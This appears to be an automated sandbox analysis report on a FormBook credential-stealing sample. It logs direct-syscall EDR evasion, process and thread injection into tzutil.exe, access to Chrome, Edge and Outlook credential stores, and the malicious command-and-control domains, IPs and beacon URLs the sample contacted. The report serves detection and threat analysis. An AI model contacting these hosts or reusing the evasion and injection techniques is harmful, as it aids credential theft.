Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BEA60 mov eax, dword ptr fs:[00000030h]	3_2_010BEA60
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108CA72 mov eax, dword ptr fs:[00000030h]	3_2_0108CA72
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108CA72 mov eax, dword ptr fs:[00000030h]	3_2_0108CA72
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101EA80 mov eax, dword ptr fs:[00000030h]	3_2_0101EA80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101EA80 mov eax, dword ptr fs:[00000030h]	3_2_0101EA80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101EA80 mov eax, dword ptr fs:[00000030h]	3_2_0101EA80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101EA80 mov eax, dword ptr fs:[00000030h]	3_2_0101EA80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101EA80 mov eax, dword ptr fs:[00000030h]	3_2_0101EA80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101EA80 mov eax, dword ptr fs:[00000030h]	3_2_0101EA80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101EA80 mov eax, dword ptr fs:[00000030h]	3_2_0101EA80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101EA80 mov eax, dword ptr fs:[00000030h]	3_2_0101EA80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101EA80 mov eax, dword ptr fs:[00000030h]	3_2_0101EA80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E4A80 mov eax, dword ptr fs:[00000030h]	3_2_010E4A80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01048A90 mov edx, dword ptr fs:[00000030h]	3_2_01048A90
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01018AA0 mov eax, dword ptr fs:[00000030h]	3_2_01018AA0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01018AA0 mov eax, dword ptr fs:[00000030h]	3_2_01018AA0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01066AA4 mov eax, dword ptr fs:[00000030h]	3_2_01066AA4
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01066ACC mov eax, dword ptr fs:[00000030h]	3_2_01066ACC
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01066ACC mov eax, dword ptr fs:[00000030h]	3_2_01066ACC
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01066ACC mov eax, dword ptr fs:[00000030h]	3_2_01066ACC
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01010AD0 mov eax, dword ptr fs:[00000030h]	3_2_01010AD0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01044AD0 mov eax, dword ptr fs:[00000030h]	3_2_01044AD0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01044AD0 mov eax, dword ptr fs:[00000030h]	3_2_01044AD0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104AAEE mov eax, dword ptr fs:[00000030h]	3_2_0104AAEE
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104AAEE mov eax, dword ptr fs:[00000030h]	3_2_0104AAEE
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102AD00 mov eax, dword ptr fs:[00000030h]	3_2_0102AD00

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtQueryValueKey: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtOpenKeyEx: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

Memory written: C:\Users\user\Desktop\3qsTcL9MOT.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: NULL target: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: NULL target: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: NULL target: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: NULL target: C:\Users\user\Desktop\3qsTcL9MOT.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Section loaded: NULL target: C:\Users\user\Desktop\3qsTcL9MOT.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\tzutil.exe

Thread register set: target process: 1868

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\tzutil.exe

Thread APC queued: target process: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe

Jump to behavior

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process created: C:\Users\user\Desktop\3qsTcL9MOT.exe "C:\Users\user\Desktop\3qsTcL9MOT.exe"	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: GxqFOvQfqyr.exe, 00000005.00000000.2214241238.0000000001881000.00000002.00000001.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000005.00000002.4510360078.0000000001881000.00000002.00000001.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000000.2363209205.0000000001051000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: GxqFOvQfqyr.exe, 00000005.00000000.2214241238.0000000001881000.00000002.00000001.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000005.00000002.4510360078.0000000001881000.00000002.00000001.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000000.2363209205.0000000001051000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: GxqFOvQfqyr.exe, 00000005.00000000.2214241238.0000000001881000.00000002.00000001.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000005.00000002.4510360078.0000000001881000.00000002.00000001.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000000.2363209205.0000000001051000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: GxqFOvQfqyr.exe, 00000005.00000000.2214241238.0000000001881000.00000002.00000001.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000005.00000002.4510360078.0000000001881000.00000002.00000001.00040000.00000000.sdmp, GxqFOvQfqyr.exe, 00000007.00000000.2363209205.0000000001051000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Queries volume information: C:\Users\user\Desktop\3qsTcL9MOT.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.3qsTcL9MOT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.3qsTcL9MOT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2291851698.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4512495754.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4510684852.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4510740156.00000000038A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2297013663.0000000001430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\tzutil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.3qsTcL9MOT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.3qsTcL9MOT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2291851698.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4512495754.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4510684852.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4510740156.00000000038A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2297013663.0000000001430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
3qsTcL9MOT.exe	71%	ReversingLabs	ByteCode-MSIL.Backdoor.FormBook
3qsTcL9MOT.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.clientebradesco.online	72.14.178.174	true	true	unknown
yuanda.zhongshengxinyun.com	119.28.49.194	true	true	unknown
www.personal-loans-jp8.xyz	199.59.243.227	true	true	unknown
www.cy-nrg.info	217.160.0.147	true	true	unknown
www.oxilo.info	162.0.213.94	true	true	unknown
tkdz666.w.keilao.com	103.144.219.16	true	true	unknown
natroredirect.natrocdn.com	85.159.66.93	true	true	unknown
anthonyholland.net	84.32.84.32	true	true	unknown
www.yjsdhy.top	45.197.45.172	true	true	unknown
www.redimpact.online	194.58.112.174	true	true	unknown
www.318st.com	107.163.96.57	true	true	unknown
www.726075.buzz	47.57.185.227	true	true	unknown
57ddu.top	154.23.184.218	true	true	unknown
www.farukugurluakdogan.xyz	unknown	unknown	true	unknown
www.57ddu.top	unknown	unknown	true	unknown
www.woshop.online	unknown	unknown	true	unknown
www.anthonyholland.net	unknown	unknown	true	unknown
www.pelus-pijama-pro.shop	unknown	unknown	true	unknown
www.www00437.email	unknown	unknown	true	unknown
www.siyue.xyz	unknown	unknown	true	unknown
www.cs0724sd92jj.cloud	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://www.cy-nrg.info/ds60/?1Dd0AZ=NptoDuGSTmnkVeWAwrxyuzRQqKBWh8zew1/AQPUPJcat0lU6P0BeUWoCdZx3tRqkOQ6ojXgPGKinPOP1NyNwGTjSyc4ttB+G8hVuOCWpwy4v7vXDapYH466x6ojHnThYog==&-n1P=0hFdS6	true	unknown
http://www.726075.buzz/nuiv/?1Dd0AZ=7su7kyuPS/KHUrSSGVu7suWxHYkjtEW9rejMc2pMopiQn27w9XMUnUBYAhg6Q3mcdodvpFC3LruuFA+cjx07AQKAGEKtxlRAoiigrCUyFvQ0T941BBkKKAOmk/5sJmea3Q==&-n1P=0hFdS6	true	unknown
http://www.clientebradesco.online/wouj/?1Dd0AZ=yWYB/R3wDrDMgv7/2h3mR36Svhbv8gHDqbTO7lKikOEauwAayMxscd89e9z4JUSFkkGyyfBsvTMtsJwN77reRgx2ev+oO3VaoDEPpI9NdXcV24A2tAPhqcySUcuIIvkh6g==&-n1P=0hFdS6	true	unknown
http://www.anthonyholland.net/rk2p/	true	unknown
http://www.cs0724sd92jj.cloud/tma8/	true	unknown
http://www.clientebradesco.online/wouj/	true	unknown
http://www.oxilo.info/ve3g/	true	unknown
http://www.oxilo.info/ve3g/?1Dd0AZ=OTcOv8w+bCTLwtzbPVHaVBaVlmgm7BOGOBYyNnUD5x742Zgn72+Avt/ao6tsWGE5AAzMA+xeSHuleySgj3Ruc3Zh0Y3NGXhxV/AZkf+qXDjjwczoUoJ8qIseLUJpArAgGg==&-n1P=0hFdS6	true	unknown
http://www.farukugurluakdogan.xyz/mx00/	true	unknown
http://www.www00437.email/4qyv/?1Dd0AZ=YhEDIJyIBDBVYSqg/FaaSQqWMygBCOgWZYLNoJq+YB+tZNzGQAjy4s0gWfbYy8w7+pcTl2oQj4oxHqFf55zNmc3S9meoJwD5mOlZ7ywSk7a0PFA/uq20of9/npEWtw3ogQ==&-n1P=0hFdS6	true	unknown
http://www.318st.com/hpj7/	true	unknown
http://www.personal-loans-jp8.xyz/slxf/	true	unknown
http://www.anthonyholland.net/rk2p/?-n1P=0hFdS6&1Dd0AZ=+pKvT+T6aI4mLrB8VovWrZ9aurXWw1oR3cjAxWZJwguM4Y26gXhm+92mk/Xvsm02xKxFuv5v6XNtx495ochGGgbX0HHEn//toJhu4nkHjRxJ0fg9XMahDIpubfdL/wf/HQ==	true	unknown
http://www.personal-loans-jp8.xyz/slxf/?1Dd0AZ=Mb3F8yBS6AlbUJPyZs3X69r2DqN8IvT5IyZZHGmk1vQlgc6dIBTXJS0PrtljhQmz1YN0gN0Ls4vblXiCECQJAAozx7p4dDONpSd/YuBCScUyPep9ny5nGU0OrFlk67uJPQ==&-n1P=0hFdS6	true	unknown
http://www.57ddu.top/1h9c/	true	unknown
http://www.yjsdhy.top/tsl3/	true	unknown
http://www.www00437.email/4qyv/	true	unknown
http://www.318st.com/hpj7/?-n1P=0hFdS6&1Dd0AZ=X5pkhncivmKNwc5IHzwKv2V+WlWG/NRpDmwvfoQjjuJNRlGXFXD+t3RxF1NKvRE2Xyic5AtQwV6vRmAQ2NBYpUrTbxGdn/5d8rnNk74oeipYn988AGhjCztrSCL7Uz3dwQ==	true	unknown
http://www.farukugurluakdogan.xyz/mx00/?1Dd0AZ=qileVsN1diZFcCO3Qsw4YZf+VstA9OzPNQ7Oa8/FkrUJR0uYa1wUZggpoqScYraC15jy36uBsEEpRc6ILD1+pn39gh+i/JJWwEE6vnOCgWAwHzuRQDxiPAmp6FvDKEZlxA==&-n1P=0hFdS6	true	unknown
